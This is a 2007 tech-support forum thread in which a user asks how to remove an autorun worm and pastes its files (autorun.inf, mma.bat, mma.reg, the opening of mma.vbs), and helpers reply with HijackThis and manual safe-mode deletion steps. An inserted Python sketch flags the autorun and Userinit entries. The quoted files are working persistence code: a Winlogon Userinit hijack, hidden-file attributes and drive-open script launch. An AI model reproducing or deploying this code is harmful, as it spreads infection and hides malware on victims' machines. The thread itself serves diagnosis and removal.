
My Hard Disks Are Infected With Autorun.inf, Mma.bat, Mma.rar, Mma.reg, Mma.vbs



#1 Code_M


Posted 28 November 2007 - 08:26 PM

My brother downloaded a video converter from an unknown website. This is what happened. Every time I open a hard disk it directs me to another explorer. I tried removing it but it comes back in a minute. If anyone can help, please tell me how to remove this. Here are the steps I took. I tried removing it with NOD32 and Sophos anti-virus. I even used the BitDefender online scan and it can't be detected. I know this is a virus. Help me. Thanks.

The contents are:
autorun.inf
mma.bat
mma.rar
mma.reg
mma.vbs

autorun.inf
Code:
[autorun]
open=
shell\open=Open(Sub7@Chatx.net)
shell\open\Command=WScript.exe .\mma.vbs
shell\open\Default=1
shell\explore=explore(Sub7@Chatx.net)
shell\explore\Command=WScript.exe .\mma.vbs


mma.bat
Code:
@echo off
if exist .\mma.reg regedit /s .\mma.reg
if not "%1"=="" goto open
if exist mma.vbs start WScript.exe mma.vbs&exit
if exist %SYSTEMROOT%\system32\mma.vbs start WScript.exe %SYSTEMROOT%\system32\mma.vbs&exit
exit
:open
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if "%1"=="+" attrib +s +a +h +r %2\mma.*
if "%1"=="+" attrib +s +a +h +r %2\autorun.inf
:end


mma.reg
Code:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,mma.bat"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000


mma.vbs
Code:
'dranyamcram v1.0
'Davao City Phils
'September 3, 2007
'Sub7@ChatX.net

on error resume next
Set WshShell =CreateObject("WScript.Shell")


For i=1 to 1

set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1)
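
A triage sketch for the autorun.inf and mma.reg contents quoted in the post above, added here as an example and not part of the original thread: it flags autorun.inf command entries that launch a script, and any Winlogon Userinit entry other than userinit.exe in a .reg export. The function names and the script-host and extension watch lists are assumptions; the sample strings are copied from the post (mma.reg is cut down to its Winlogon key).

```python
import re
# Constructed sample input: the autorun.inf and mma.reg (Winlogon key only) text from the post.
AUTORUN_INF = r"""[autorun]
open=
shell\open=Open(Sub7@Chatx.net)
shell\open\Command=WScript.exe .\mma.vbs
shell\open\Default=1
shell\explore=explore(Sub7@Chatx.net)
shell\explore\Command=WScript.exe .\mma.vbs
"""
MMA_REG = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,mma.bat"
"""
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe"}  # assumed watch list
SCRIPT_EXTS = (".vbs", ".bat", ".cmd", ".js")             # assumed watch list
CMD_KEY = re.compile(r"open|shellexecute|shell\\[^\\]+\\command")

def autorun_findings(text):
    """Return (key, value) for [autorun] command entries that launch a script."""
    found, in_section = [], False
    for line in map(str.strip, text.splitlines()):
        if line.startswith("["):
            in_section = line.lower() == "[autorun]"
        elif in_section and "=" in line:
            key, value = (p.strip() for p in line.split("=", 1))
            tokens = value.lower().split()
            if tokens and CMD_KEY.fullmatch(key.lower()):
                host = tokens[0].rsplit("\\", 1)[-1]
                if host in SCRIPT_HOSTS or any(t.endswith(SCRIPT_EXTS) for t in tokens):
                    found.append((key, value))
    return found

def userinit_extras(text):
    """Return Winlogon Userinit entries in a .reg export other than userinit.exe."""
    extras, key = [], ""
    for line in map(str.strip, text.splitlines()):
        m = re.fullmatch(r'"userinit"="(.*)"', line, re.IGNORECASE)
        if line.startswith("["):
            key = line.strip("[]").lower()
        elif m and key.endswith("\\winlogon"):
            # Stock value is userinit.exe alone; any extra entry runs at every logon.
            for entry in filter(None, map(str.strip, m.group(1).split(","))):
                if entry.lower().rsplit("\\", 1)[-1] != "userinit.exe":
                    extras.append(entry)
    return extras

if __name__ == "__main__":
    print(autorun_findings(AUTORUN_INF), userinit_extras(MMA_REG))
```

On the sample it reports both shell verb commands (Open and Explore run WScript.exe against mma.vbs) and the mma.bat entry appended to Userinit.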


#2 SpySentinel


Posted 29 November 2007 - 05:14 PM

Please follow the steps below so we can make sure you're cleaned properly:

Download HijackThis™ here:
http://www.trendsecure.com/portal/en-US/th.../hijackthis.php

Click 'Do a System Scan and Save log'. The HJT log will open in notepad. Don't try to fix anything yourself.

Copy and paste the contents of the HJT log into a NEW TOPIC in "HijackThis Logs and Malware Removal"
http://www.bleepingcomputer.com/forums/f/22/virus-trojan-spyware-and-malware-removal-logs/

Also include a link to this topic. Please be patient as our HJT team members work on several forums.

Also you can read the Preparation Guide for use before posting a HijackThis Log


#3 quietman7


Posted 30 November 2007 - 03:42 PM

Please insert your flash drives before we begin!

Download Flash_Disinfector.exe by sUBs and save it to your desktop.
  • Double-click Flash_Disinfector.exe to run it and follow any prompts that may appear.
  • The utility may ask you to insert your flash drive and/or other removable drives. Please do so and allow the utility to clean up those drives as well.
  • Wait until it has finished scanning and then exit the program.
  • Reboot your computer when done.
Note: Flash_Disinfector will create a hidden folder named autorun.inf in each partition and every USB drive plugged in when you ran it. Don't delete this folder...it will help protect your drives from future infection.

Reboot your computer in "Safe Mode" or "Safe Mode With Command Prompt" using the F8 method. To do this, restart your computer and after hearing your computer beep once during startup (but before the Windows icon appears) press the F8 key repeatedly. A menu will appear with several options. Use the arrow keys to navigate and select the option to run Windows in "Safe Mode With Command Prompt".

Go to Start > Run and type: cmd
  • Press OK.
  • At the command prompt, type in your primary drive location, usually C:
  • You may need to change the directory. If so type: cd \
  • Hit Enter.
  • Type: attrib -s -h -r -a autorun.inf
  • Hit Enter.
  • Type: dir
  • Hit Enter. This will allow you to see and confirm the Autorun files.
  • Type: del autorun.inf
  • Hit Enter.
  • Repeat the above commands for each drive on your computer.
Now search for and remove Mma.vbs, Mma.rar, Mma.reg, Mma.bat if present.
  • At the command prompt, type in your primary drive location, usually C:
  • Hit Enter.
  • Type: attrib -s -h -r -a Mma.vbs
  • Hit Enter.
  • Type: dir /s Mma.vbs
  • Hit Enter.
  • If the file is present, type: del Mma.vbs
  • Hit Enter.
  • Repeat the above commands for each drive on your computer.
  • Then repeat these instructions for Mma.rar, Mma.reg, Mma.bat
  • Exit the command prompt and reboot normally.
When done remove any Startup RUN values by downloading and using Autoruns.



